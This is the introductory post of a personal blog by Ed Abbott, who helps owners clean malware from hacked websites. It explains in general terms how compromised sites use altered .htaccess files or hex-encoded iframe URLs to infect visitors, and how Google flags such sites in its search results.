This is the first post of a new blog.
I'm writing because I'm sometimes asked
to rid someone of malware on their website.
Also, I like to keep my own personal computer
malware free.
Malware can be a virus or it can be spyware.
Malware is software that is evil.
Recently, I was sent an inquiry by someone
whose website was hacked and malware installed.
Or more precisely, the website was hacked so
that the website would serve as a vehicle to
install malware on other people's computers.
The strategy?
Take an innocent website and use it to install
malware on the computers of web visitors that
happen to visit this site.
In many many cases, the website owner is as much
an innocent and injured victim as his web visitors
are.
Website owners contact me asking for help with this
problem.
In one recent case, the website was hacked and the
.htaccess file was compromised.
In another case, the compromised website has a javascript
document.write() function that has a hexidecimal encoded
URL in it.
The strategy in both cases?
Set up a frame or iframe URL that addresses a website
that installs malware.
The advantage of this approach, from the bad guys point
of view, is that the website that has been hacked and
compromised appears innocent.
There are no indicators that you are visiting a hacked
and compromised site.
Google to the rescue!
Google now identifies sites that have been compromised.
Google identifies these sites as sites that may damage
your computer. In some cases, Google goes so far as
to suggest that you visit another site.
Google makes this identification via its search results.
That is to say, on any give search, Google will possibly
identify certain sites as being malware sites.
I don't consider myself an expert on malware. One of
my primary motives for starting this blog is to educate
myself further.
As I learn more, I'll write more.
Ed Abbott
No comments:
Post a Comment